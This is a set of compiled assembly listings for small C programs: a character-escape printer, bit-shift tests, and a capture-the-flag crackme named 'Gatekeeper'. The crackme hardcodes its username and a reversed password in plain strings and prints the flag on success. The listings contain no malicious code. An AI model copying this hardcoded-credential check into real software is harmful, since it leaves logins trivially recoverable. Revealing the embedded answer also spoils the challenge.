.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 callq _getchar movl %eax, -8(%rbp) cmpl $-1, %eax je LBB0_8 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl -8(%rbp), %eax movl %eax, -12(%rbp) ## 4-byte Spill subl $8, %eax je LBB0_4 jmp LBB0_9 LBB0_9: ## in Loop: Header=BB0_1 Depth=1 movl -12(%rbp), %eax ## 4-byte Reload subl $9, %eax je LBB0_3 jmp LBB0_10 LBB0_10: ## in Loop: Header=BB0_1 Depth=1 movl -12(%rbp), %eax ## 4-byte Reload subl $92, %eax je LBB0_5 jmp LBB0_6 LBB0_3: ## in Loop: Header=BB0_1 Depth=1 leaq L_.str(%rip), %rdi movb $0, %al callq _printf jmp LBB0_7 LBB0_4: ## in Loop: Header=BB0_1 Depth=1 leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf jmp LBB0_7 LBB0_5: ## in Loop: Header=BB0_1 Depth=1 leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf jmp LBB0_7 LBB0_6: ## in Loop: Header=BB0_1 Depth=1 movl -8(%rbp), %edi callq _putchar LBB0_7: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_1 LBB0_8: movl -4(%rbp), %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "\\t" L_.str.1: ## @.str.1 .asciz "\\b" L_.str.2: ## @.str.2 .asciz "\\\\" .subsections_via_symbols
the_stack_data/211080496.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
the_stack_data/55938.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _text_animation ; -- Begin function text_animation .p2align 2 _text_animation: ; @text_animation .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #8] ldrb w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_3 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldr x8, [sp, #8] add x9, x8, #1 str x9, [sp, #8] ldrsb w0, [x8] bl _putchar mov x0, #0 bl _fflush mov w0, #10000 bl _usleep b LBB0_1 LBB0_3: ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _verify_animation ; -- Begin function verify_animation .p2align 2 _verify_animation: ; @verify_animation .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] adrp x8, l___const.verify_animation.states@PAGE add x8, x8, l___const.verify_animation.states@PAGEOFF ldr w8, [x8] stur w8, [x29, #-8] stur wzr, [x29, #-12] b LBB1_1 LBB1_1: ; =>This Loop Header: Depth=1 ; Child Loop BB1_3 Depth 2 ; Child Loop BB1_5 Depth 3 ldur w8, [x29, #-12] ldur w9, [x29, #-4] subs w8, w8, w9 cset w8, hs tbnz w8, #0, LBB1_12 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 str wzr, [sp, #16] b LBB1_3 LBB1_3: ; Parent Loop BB1_1 Depth=1 ; => This Loop Header: Depth=2 ; Child Loop BB1_5 Depth 3 ldr w8, [sp, #16] subs w8, w8, #3 cset w8, ge tbnz w8, #0, LBB1_10 b LBB1_4 LBB1_4: ; in Loop: Header=BB1_3 Depth=2 str wzr, [sp, #12] b LBB1_5 LBB1_5: ; Parent Loop BB1_1 Depth=1 ; Parent Loop BB1_3 Depth=2 ; => This Inner Loop Header: Depth=3 ldrsw x8, [sp, #12] subs x8, x8, #4 cset w8, hs tbnz w8, #0, LBB1_8 b LBB1_6 LBB1_6: ; in Loop: Header=BB1_5 Depth=3 ldrsw x9, [sp, #12] sub x8, x29, #8 ldrsb w0, [x8, x9] bl _putchar mov w0, #8 bl _putchar mov x0, #0 bl _fflush mov w0, #34464 movk w0, #1, lsl #16 bl _usleep b LBB1_7 LBB1_7: ; in Loop: Header=BB1_5 Depth=3 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB1_5 LBB1_8: ; in Loop: Header=BB1_3 Depth=2 b LBB1_9 LBB1_9: ; in Loop: Header=BB1_3 Depth=2 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB1_3 LBB1_10: ; in Loop: Header=BB1_1 Depth=1 mov w0, #46 bl _putchar b LBB1_11 LBB1_11: ; in Loop: Header=BB1_1 Depth=1 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB1_1 LBB1_12: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #272 .cfi_def_cfa_offset 272 stp x28, x27, [sp, #240] ; 16-byte Folded Spill stp x29, x30, [sp, #256] ; 16-byte Folded Spill add x29, sp, #256 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str wzr, [sp, #100] str w0, [sp, #96] str x1, [sp, #88] adrp x0, _HEADER@PAGE add x0, x0, _HEADER@PAGEOFF bl _text_animation ldr w8, [sp, #96] subs w8, w8, #3 cset w8, eq tbnz w8, #0, LBB2_2 b LBB2_1 LBB2_1: adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldr x8, [sp, #88] ldr x8, [x8] mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf mov w8, #1 str w8, [sp, #100] b LBB2_13 LBB2_2: adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _text_animation mov w0, #3 bl _verify_animation ldr x8, [sp, #88] ldr x0, [x8, #8] adrp x1, l_.str.3@PAGE add x1, x1, l_.str.3@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB2_4 b LBB2_3 LBB2_3: mov w0, #10 bl _putchar adrp x0, _ACCESS_DENIED@PAGE add x0, x0, _ACCESS_DENIED@PAGEOFF bl _text_animation adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _text_animation mov w8, #1 str w8, [sp, #100] b LBB2_13 LBB2_4: ldr x8, [sp, #88] ldr x0, [x8, #16] bl _strlen add x0, x0, #1 bl _malloc str x0, [sp, #80] ldr x0, [sp, #80] ldr x8, [sp, #88] ldr x1, [x8, #16] mov x2, #-1 bl ___strcpy_chk str xzr, [sp, #72] b LBB2_5 LBB2_5: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #72] str x8, [sp, #56] ; 8-byte Folded Spill ldr x0, [sp, #80] bl _strlen ldr x8, [sp, #56] ; 8-byte Folded Reload subs x8, x8, x0, lsr #1 cset w8, hs tbnz w8, #0, LBB2_8 b LBB2_6 LBB2_6: ; in Loop: Header=BB2_5 Depth=1 ldr x8, [sp, #80] ldr x9, [sp, #72] add x8, x8, x9 ldrb w8, [x8] strb w8, [sp, #71] ldr x8, [sp, #80] str x8, [sp, #32] ; 8-byte Folded Spill ldr x0, [sp, #80] bl _strlen ldr x8, [sp, #32] ; 8-byte Folded Reload ldr x9, [sp, #72] subs x9, x0, x9 subs x9, x9, #1 add x8, x8, x9 ldrb w8, [x8] ldr x9, [sp, #80] ldr x10, [sp, #72] add x9, x9, x10 strb w8, [x9] ldrb w8, [sp, #71] str w8, [sp, #52] ; 4-byte Folded Spill ldr x8, [sp, #80] str x8, [sp, #40] ; 8-byte Folded Spill ldr x0, [sp, #80] bl _strlen ldr x9, [sp, #40] ; 8-byte Folded Reload ldr w8, [sp, #52] ; 4-byte Folded Reload ldr x10, [sp, #72] subs x10, x0, x10 subs x10, x10, #1 add x9, x9, x10 strb w8, [x9] b LBB2_7 LBB2_7: ; in Loop: Header=BB2_5 Depth=1 ldr x8, [sp, #72] add x8, x8, #1 str x8, [sp, #72] b LBB2_5 LBB2_8: mov w0, #3 bl _verify_animation ldr x0, [sp, #80] adrp x1, l_.str.5@PAGE add x1, x1, l_.str.5@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_10 b LBB2_9 LBB2_9: adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF bl _text_animation adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF bl _text_animation ldr x8, [sp, #88] ldr x8, [x8, #16] mov x9, sp str x8, [x9] add x0, sp, #104 str x0, [sp, #24] ; 8-byte Folded Spill mov x3, #128 mov x1, x3 mov w2, #0 adrp x4, l_.str.8@PAGE add x4, x4, l_.str.8@PAGEOFF bl ___snprintf_chk ldr x0, [sp, #24] ; 8-byte Folded Reload bl _text_animation b LBB2_11 LBB2_10: adrp x0, _ACCESS_DENIED@PAGE add x0, x0, _ACCESS_DENIED@PAGEOFF bl _text_animation adrp x0, l_.str.9@PAGE add x0, x0, l_.str.9@PAGEOFF bl _text_animation b LBB2_11 LBB2_11: b LBB2_12 LBB2_12: str wzr, [sp, #100] b LBB2_13 LBB2_13: ldr w8, [sp, #100] str w8, [sp, #20] ; 4-byte Folded Spill ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB2_15 b LBB2_14 LBB2_14: bl ___stack_chk_fail LBB2_15: ldr w0, [sp, #20] ; 4-byte Folded Reload ldp x29, x30, [sp, #256] ; 16-byte Folded Reload ldp x28, x27, [sp, #240] ; 16-byte Folded Reload add sp, sp, #272 ret .cfi_endproc ; -- End function .section __TEXT,__const .globl _HEADER ; @HEADER _HEADER: .asciz "/===========================================================================\\\n| Gatekeeper - Access your PC from everywhere! |\n+===========================================================================+\n" .globl _ACCESS_DENIED ; @ACCESS_DENIED _ACCESS_DENIED: .asciz "ACCESS DENIED\n" .globl _delay_per_char ; @delay_per_char .p2align 2 _delay_per_char: .long 10000 ; 0x2710 .section __TEXT,__literal4,4byte_literals l___const.verify_animation.states: ; @__const.verify_animation.states .ascii "/-\\|" .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "[ERROR] Login information missing\n" l_.str.1: ; @.str.1 .asciz "Usage: %s <username> <password>\n" l_.str.2: ; @.str.2 .asciz " ~> Verifying." l_.str.3: ; @.str.3 .asciz "0n3_W4rM" l_.str.4: ; @.str.4 .asciz " ~> Incorrect username\n" l_.str.5: ; @.str.5 .asciz "zLl1ks_d4m_T0g_I" l_.str.6: ; @.str.6 .asciz "Correct!\n" l_.str.7: ; @.str.7 .asciz "Welcome back!\n" l_.str.8: ; @.str.8 .asciz "CTF{%s}\n" l_.str.9: ; @.str.9 .asciz " ~> Incorrect password\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _text_animation ## -- Begin function text_animation .p2align 4, 0x90 _text_animation: ## @text_animation .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movq -8(%rbp), %rax cmpb $0, (%rax) je LBB0_3 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movq -8(%rbp), %rax movq %rax, %rcx addq $1, %rcx movq %rcx, -8(%rbp) movsbl (%rax), %edi callq _putchar xorl %eax, %eax movl %eax, %edi callq _fflush movl $10000, %edi ## imm = 0x2710 callq _usleep jmp LBB0_1 LBB0_3: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _verify_animation ## -- Begin function verify_animation .p2align 4, 0x90 _verify_animation: ## @verify_animation .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl %edi, -4(%rbp) movl L___const.verify_animation.states(%rip), %eax movl %eax, -8(%rbp) movl $0, -12(%rbp) LBB1_1: ## =>This Loop Header: Depth=1 ## Child Loop BB1_3 Depth 2 ## Child Loop BB1_5 Depth 3 movl -12(%rbp), %eax cmpl -4(%rbp), %eax jae LBB1_12 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movl $0, -16(%rbp) LBB1_3: ## Parent Loop BB1_1 Depth=1 ## => This Loop Header: Depth=2 ## Child Loop BB1_5 Depth 3 cmpl $3, -16(%rbp) jge LBB1_10 ## %bb.4: ## in Loop: Header=BB1_3 Depth=2 movl $0, -20(%rbp) LBB1_5: ## Parent Loop BB1_1 Depth=1 ## Parent Loop BB1_3 Depth=2 ## => This Inner Loop Header: Depth=3 movslq -20(%rbp), %rax cmpq $4, %rax jae LBB1_8 ## %bb.6: ## in Loop: Header=BB1_5 Depth=3 movslq -20(%rbp), %rax movsbl -8(%rbp,%rax), %edi callq _putchar movl $8, %edi callq _putchar xorl %eax, %eax movl %eax, %edi callq _fflush movl $100000, %edi ## imm = 0x186A0 callq _usleep ## %bb.7: ## in Loop: Header=BB1_5 Depth=3 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB1_5 LBB1_8: ## in Loop: Header=BB1_3 Depth=2 jmp LBB1_9 LBB1_9: ## in Loop: Header=BB1_3 Depth=2 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB1_3 LBB1_10: ## in Loop: Header=BB1_1 Depth=1 movl $46, %edi callq _putchar ## %bb.11: ## in Loop: Header=BB1_1 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB1_1 LBB1_12: addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $224, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -148(%rbp) movl %edi, -152(%rbp) movq %rsi, -160(%rbp) leaq _HEADER(%rip), %rdi callq _text_animation cmpl $3, -152(%rbp) je LBB2_2 ## %bb.1: leaq L_.str(%rip), %rdi movb $0, %al callq _printf movq -160(%rbp), %rax movq (%rax), %rsi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movl $1, -148(%rbp) jmp LBB2_13 LBB2_2: leaq L_.str.2(%rip), %rdi callq _text_animation movl $3, %edi callq _verify_animation movq -160(%rbp), %rax movq 8(%rax), %rdi leaq L_.str.3(%rip), %rsi callq _strcmp cmpl $0, %eax je LBB2_4 ## %bb.3: movl $10, %edi callq _putchar leaq _ACCESS_DENIED(%rip), %rdi callq _text_animation leaq L_.str.4(%rip), %rdi callq _text_animation movl $1, -148(%rbp) jmp LBB2_13 LBB2_4: movq -160(%rbp), %rax movq 16(%rax), %rdi callq _strlen movq %rax, %rdi addq $1, %rdi callq _malloc movq %rax, -168(%rbp) movq -168(%rbp), %rdi movq -160(%rbp), %rax movq 16(%rax), %rsi movq $-1, %rdx callq ___strcpy_chk movq $0, -176(%rbp) LBB2_5: ## =>This Inner Loop Header: Depth=1 movq -176(%rbp), %rax movq %rax, -192(%rbp) ## 8-byte Spill movq -168(%rbp), %rdi callq _strlen movq %rax, %rcx movq -192(%rbp), %rax ## 8-byte Reload shrq $1, %rcx cmpq %rcx, %rax jae LBB2_8 ## %bb.6: ## in Loop: Header=BB2_5 Depth=1 movq -168(%rbp), %rax movq -176(%rbp), %rcx movb (%rax,%rcx), %al movb %al, -177(%rbp) movq -168(%rbp), %rax movq %rax, -216(%rbp) ## 8-byte Spill movq -168(%rbp), %rdi callq _strlen movq %rax, %rcx movq -216(%rbp), %rax ## 8-byte Reload subq -176(%rbp), %rcx subq $1, %rcx movb (%rax,%rcx), %dl movq -168(%rbp), %rax movq -176(%rbp), %rcx movb %dl, (%rax,%rcx) movb -177(%rbp), %al movb %al, -201(%rbp) ## 1-byte Spill movq -168(%rbp), %rax movq %rax, -200(%rbp) ## 8-byte Spill movq -168(%rbp), %rdi callq _strlen movb -201(%rbp), %dl ## 1-byte Reload movq %rax, %rcx movq -200(%rbp), %rax ## 8-byte Reload subq -176(%rbp), %rcx subq $1, %rcx movb %dl, (%rax,%rcx) ## %bb.7: ## in Loop: Header=BB2_5 Depth=1 movq -176(%rbp), %rax addq $1, %rax movq %rax, -176(%rbp) jmp LBB2_5 LBB2_8: movl $3, %edi callq _verify_animation movq -168(%rbp), %rdi leaq L_.str.5(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_10 ## %bb.9: leaq L_.str.6(%rip), %rdi callq _text_animation leaq L_.str.7(%rip), %rdi callq _text_animation leaq -144(%rbp), %rdi movq -160(%rbp), %rax movq 16(%rax), %r9 movl $128, %ecx xorl %edx, %edx leaq L_.str.8(%rip), %r8 movq %rcx, %rsi movb $0, %al callq ___snprintf_chk leaq -144(%rbp), %rdi callq _text_animation jmp LBB2_11 LBB2_10: leaq _ACCESS_DENIED(%rip), %rdi callq _text_animation leaq L_.str.9(%rip), %rdi callq _text_animation LBB2_11: jmp LBB2_12 LBB2_12: movl $0, -148(%rbp) LBB2_13: movl -148(%rbp), %eax movl %eax, -220(%rbp) ## 4-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB2_15 ## %bb.14: movl -220(%rbp), %eax ## 4-byte Reload addq $224, %rsp popq %rbp retq LBB2_15: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__const .globl _HEADER ## @HEADER .p2align 4 _HEADER: .asciz "/===========================================================================\\\n| Gatekeeper - Access your PC from everywhere! |\n+===========================================================================+\n" .globl _ACCESS_DENIED ## @ACCESS_DENIED _ACCESS_DENIED: .asciz "ACCESS DENIED\n" .globl _delay_per_char ## @delay_per_char .p2align 2 _delay_per_char: .long 10000 ## 0x2710 .section __TEXT,__literal4,4byte_literals L___const.verify_animation.states: ## @__const.verify_animation.states .ascii "/-\\|" .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "[ERROR] Login information missing\n" L_.str.1: ## @.str.1 .asciz "Usage: %s <username> <password>\n" L_.str.2: ## @.str.2 .asciz " ~> Verifying." L_.str.3: ## @.str.3 .asciz "0n3_W4rM" L_.str.4: ## @.str.4 .asciz " ~> Incorrect username\n" L_.str.5: ## @.str.5 .asciz "zLl1ks_d4m_T0g_I" L_.str.6: ## @.str.6 .asciz "Correct!\n" L_.str.7: ## @.str.7 .asciz "Welcome back!\n" L_.str.8: ## @.str.8 .asciz "CTF{%s}\n" L_.str.9: ## @.str.9 .asciz " ~> Incorrect password\n" .subsections_via_symbols
the_stack_data/1097354.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _fn1 ; -- Begin function fn1 .p2align 2 _fn1: ; @fn1 .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str w0, [sp, #12] ldr w9, [sp, #12] mov w8, #1 lsl w8, w8, w9 ands w8, w8, #0x1 cset w8, ne and w0, w8, #0x1 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _fn2 ; -- Begin function fn2 .p2align 2 _fn2: ; @fn2 .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str w0, [sp, #12] ldr w9, [sp, #12] mov w8, #1 lsl w9, w8, w9 ands w8, w8, w9 cset w8, ne and w0, w8, #0x1 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _fn3 ; -- Begin function fn3 .p2align 2 _fn3: ; @fn3 .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str w0, [sp, #12] ldr w9, [sp, #12] mov w8, #1 lsl w8, w8, w9 ands w8, w8, #0x1 cset w8, eq and w0, w8, #0x1 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _fn4 ; -- Begin function fn4 .p2align 2 _fn4: ; @fn4 .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str w0, [sp, #12] ldr w9, [sp, #12] mov w8, #1 lsl w9, w8, w9 ands w8, w8, w9 cset w8, eq and w0, w8, #0x1 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 mov x29, sp .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w0, #0 bl _fn1 subs w8, w0, #1 cset w8, ne tbnz w8, #0, LBB4_6 b LBB4_1 LBB4_1: mov w0, #1 bl _fn1 subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB4_6 b LBB4_2 LBB4_2: mov w0, #2 bl _fn1 subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB4_6 b LBB4_3 LBB4_3: mov w0, #3 bl _fn1 subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB4_6 b LBB4_4 LBB4_4: mov w0, #4 bl _fn1 subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB4_6 b LBB4_5 LBB4_5: mov w0, #5 bl _fn1 subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB4_7 b LBB4_6 LBB4_6: bl _abort LBB4_7: mov w0, #0 bl _fn2 subs w8, w0, #1 cset w8, ne tbnz w8, #0, LBB4_13 b LBB4_8 LBB4_8: mov w0, #1 bl _fn2 subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB4_13 b LBB4_9 LBB4_9: mov w0, #2 bl _fn2 subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB4_13 b LBB4_10 LBB4_10: mov w0, #3 bl _fn2 subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB4_13 b LBB4_11 LBB4_11: mov w0, #4 bl _fn2 subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB4_13 b LBB4_12 LBB4_12: mov w0, #5 bl _fn2 subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB4_14 b LBB4_13 LBB4_13: bl _abort LBB4_14: mov w0, #0 bl _fn3 subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB4_20 b LBB4_15 LBB4_15: mov w0, #1 bl _fn3 subs w8, w0, #1 cset w8, ne tbnz w8, #0, LBB4_20 b LBB4_16 LBB4_16: mov w0, #2 bl _fn3 subs w8, w0, #1 cset w8, ne tbnz w8, #0, LBB4_20 b LBB4_17 LBB4_17: mov w0, #3 bl _fn3 subs w8, w0, #1 cset w8, ne tbnz w8, #0, LBB4_20 b LBB4_18 LBB4_18: mov w0, #4 bl _fn3 subs w8, w0, #1 cset w8, ne tbnz w8, #0, LBB4_20 b LBB4_19 LBB4_19: mov w0, #5 bl _fn3 subs w8, w0, #1 cset w8, eq tbnz w8, #0, LBB4_21 b LBB4_20 LBB4_20: bl _abort LBB4_21: mov w0, #0 bl _fn4 subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB4_27 b LBB4_22 LBB4_22: mov w0, #1 bl _fn4 subs w8, w0, #1 cset w8, ne tbnz w8, #0, LBB4_27 b LBB4_23 LBB4_23: mov w0, #2 bl _fn4 subs w8, w0, #1 cset w8, ne tbnz w8, #0, LBB4_27 b LBB4_24 LBB4_24: mov w0, #3 bl _fn4 subs w8, w0, #1 cset w8, ne tbnz w8, #0, LBB4_27 b LBB4_25 LBB4_25: mov w0, #4 bl _fn4 subs w8, w0, #1 cset w8, ne tbnz w8, #0, LBB4_27 b LBB4_26 LBB4_26: mov w0, #5 bl _fn4 subs w8, w0, #1 cset w8, eq tbnz w8, #0, LBB4_28 b LBB4_27 LBB4_27: bl _abort LBB4_28: mov w0, #0 ldp x29, x30, [sp], #16 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _fn1 ## -- Begin function fn1 .p2align 4, 0x90 _fn1: ## @fn1 .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movl -4(%rbp), %ecx movl $1, %eax ## kill: def $cl killed $ecx shll %cl, %eax andl $1, %eax cmpl $0, %eax setne %al andb $1, %al movzbl %al, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _fn2 ## -- Begin function fn2 .p2align 4, 0x90 _fn2: ## @fn2 .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movl -4(%rbp), %ecx movl $1, %eax ## kill: def $cl killed $ecx shll %cl, %eax andl $1, %eax cmpl $0, %eax setne %al andb $1, %al movzbl %al, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _fn3 ## -- Begin function fn3 .p2align 4, 0x90 _fn3: ## @fn3 .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movl -4(%rbp), %ecx movl $1, %eax ## kill: def $cl killed $ecx shll %cl, %eax andl $1, %eax cmpl $0, %eax sete %al andb $1, %al movzbl %al, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _fn4 ## -- Begin function fn4 .p2align 4, 0x90 _fn4: ## @fn4 .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movl -4(%rbp), %ecx movl $1, %eax ## kill: def $cl killed $ecx shll %cl, %eax andl $1, %eax cmpl $0, %eax sete %al andb $1, %al movzbl %al, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp xorl %edi, %edi callq _fn1 cmpl $1, %eax jne LBB4_6 ## %bb.1: movl $1, %edi callq _fn1 cmpl $0, %eax jne LBB4_6 ## %bb.2: movl $2, %edi callq _fn1 cmpl $0, %eax jne LBB4_6 ## %bb.3: movl $3, %edi callq _fn1 cmpl $0, %eax jne LBB4_6 ## %bb.4: movl $4, %edi callq _fn1 cmpl $0, %eax jne LBB4_6 ## %bb.5: movl $5, %edi callq _fn1 cmpl $0, %eax je LBB4_7 LBB4_6: callq _abort LBB4_7: xorl %edi, %edi callq _fn2 cmpl $1, %eax jne LBB4_13 ## %bb.8: movl $1, %edi callq _fn2 cmpl $0, %eax jne LBB4_13 ## %bb.9: movl $2, %edi callq _fn2 cmpl $0, %eax jne LBB4_13 ## %bb.10: movl $3, %edi callq _fn2 cmpl $0, %eax jne LBB4_13 ## %bb.11: movl $4, %edi callq _fn2 cmpl $0, %eax jne LBB4_13 ## %bb.12: movl $5, %edi callq _fn2 cmpl $0, %eax je LBB4_14 LBB4_13: callq _abort LBB4_14: xorl %edi, %edi callq _fn3 cmpl $0, %eax jne LBB4_20 ## %bb.15: movl $1, %edi callq _fn3 cmpl $1, %eax jne LBB4_20 ## %bb.16: movl $2, %edi callq _fn3 cmpl $1, %eax jne LBB4_20 ## %bb.17: movl $3, %edi callq _fn3 cmpl $1, %eax jne LBB4_20 ## %bb.18: movl $4, %edi callq _fn3 cmpl $1, %eax jne LBB4_20 ## %bb.19: movl $5, %edi callq _fn3 cmpl $1, %eax je LBB4_21 LBB4_20: callq _abort LBB4_21: xorl %edi, %edi callq _fn4 cmpl $0, %eax jne LBB4_27 ## %bb.22: movl $1, %edi callq _fn4 cmpl $1, %eax jne LBB4_27 ## %bb.23: movl $2, %edi callq _fn4 cmpl $1, %eax jne LBB4_27 ## %bb.24: movl $3, %edi callq _fn4 cmpl $1, %eax jne LBB4_27 ## %bb.25: movl $4, %edi callq _fn4 cmpl $1, %eax jne LBB4_27 ## %bb.26: movl $5, %edi callq _fn4 cmpl $1, %eax je LBB4_28 LBB4_27: callq _abort LBB4_28: xorl %eax, %eax popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/9720.c
